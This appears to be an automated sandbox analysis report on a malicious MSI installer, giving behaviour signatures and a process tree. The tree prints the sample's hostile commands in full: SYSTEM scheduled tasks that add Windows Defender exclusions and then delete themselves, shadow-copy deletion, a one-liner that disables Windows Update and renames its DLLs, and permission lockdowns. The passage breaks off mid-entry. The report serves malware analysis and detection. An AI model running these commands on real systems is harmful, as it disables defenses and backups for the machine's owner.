Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    30/07/2026, 08:26

General

  • Target
    install_30v8005.msi
  • Size 7.7MB
  • Sample260730-kcbagaxycs
  • SHA256 627c53c6769a9b4760cf8c4b739eddb213eb5ab50f4e8fae89a8d1261721c285
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 3 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 25 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_30v8005.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:5016
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4252
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4688
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding A7946A065359E2EF1AAA32E5CBB540B0 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:3700
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:1960
  • C:\Users\Public\b1AX5n\jZZFxQ.exe
    C:\Users\Public\b1AX5n\jZZFxQ.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\b1AX5n\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\b1AX5n\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3648
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4704
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:2020
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:708
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1900
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:1432
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:780
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:2692
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4692
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:3772
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1628
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:2760
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4040
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3544
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:1084
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:5036
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:3956
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:548
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:4528
                        • C:\Program Files (x86)\qmaocS\qmaocS.exe
                          "C:\Program Files (x86)\qmaocS\qmaocS.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:3440
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3856
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\qmaocS" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:5016
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\qmaocS" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3136
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4908
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\qmaocS\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1544
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\qmaocS\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:1432
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:4220
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:404
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                              3⤵
                              • Executes a command shell one-liner
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:748
                              • C:\Windows\SysWOW64\net.exe
                                net stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:3608
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2060
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2100
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure wuauserv reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                PID:3520
                              • C:\Windows\SysWOW64\net.exe
                                net stop UsoSvc
                                4⤵
                                  PID:4976
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop UsoSvc
                                    5⤵
                                      PID:1340
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config UsoSvc start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:2152
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc failure UsoSvc reset= 0 actions= ""
                                    4⤵
                                    • Launches sc.exe
                                    PID:1640
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop uhssvc
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2776
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop uhssvc
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1124
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config uhssvc start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:2496
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc failure uhssvc reset= 0 actions= ""
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:4536
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop WaaSMedicSvc
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4780
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop WaaSMedicSvc
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4492
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WaaSMedicSvc start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:3208
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc failure WaaSMedicSvc reset= 0 actions= ""
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:4388
                                  • C:\Windows\SysWOW64\takeown.exe
                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1132
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1780
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:4624
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:4848
                                  • C:\Windows\SysWOW64\takeown.exe
                                    takeown /f C:\Windows\System32\wuaueng.dll
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:4484
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:2604
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:4728
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:3032
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2940
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4192
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                    4⤵
                                      PID:2904
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      PID:4984
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:4408
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4340
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                        PID:1500
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3532
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of WriteProcessMemory
                                      PID:3424
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3740
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                          PID:3956
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Delete /TN "Task1" /F
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:888
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\qmaocS" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of WriteProcessMemory
                                        PID:4380
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\qmaocS" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:2932
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\qmaocS" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of WriteProcessMemory
                                        PID:2544
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\qmaocS" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:216
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\qmaocS.exe" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        • Suspicious use of WriteProcessMemory
                                        PID:4512
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\qmaocS\qmaocS.exe" /inheritance:r
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:568
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\qmaocS.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of WriteProcessMemory
                                        PID:3384
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          4⤵
                                            PID:4220
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\qmaocS.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:4492
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\qmaocS.exe" /grant:r Users:(RX) /deny Users:(DE)
                                          3⤵
                                          • Executes a command shell one-liner
                                          • Suspicious use of WriteProcessMemory
                                          PID:4116
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\qmaocS.exe" /grant:r Users:(RX) /deny Users:(DE)
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:3956
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\image.png" /inheritance:r
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:3356
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\image.png" /inheritance:r
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            PID:4908
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          3⤵
                                          • Executes a command shell one-liner
                                          • Suspicious use of WriteProcessMemory
                                          PID:3496
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            PID:988
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\image.png" /grant:r Users:(RX) /deny Users:(DE)
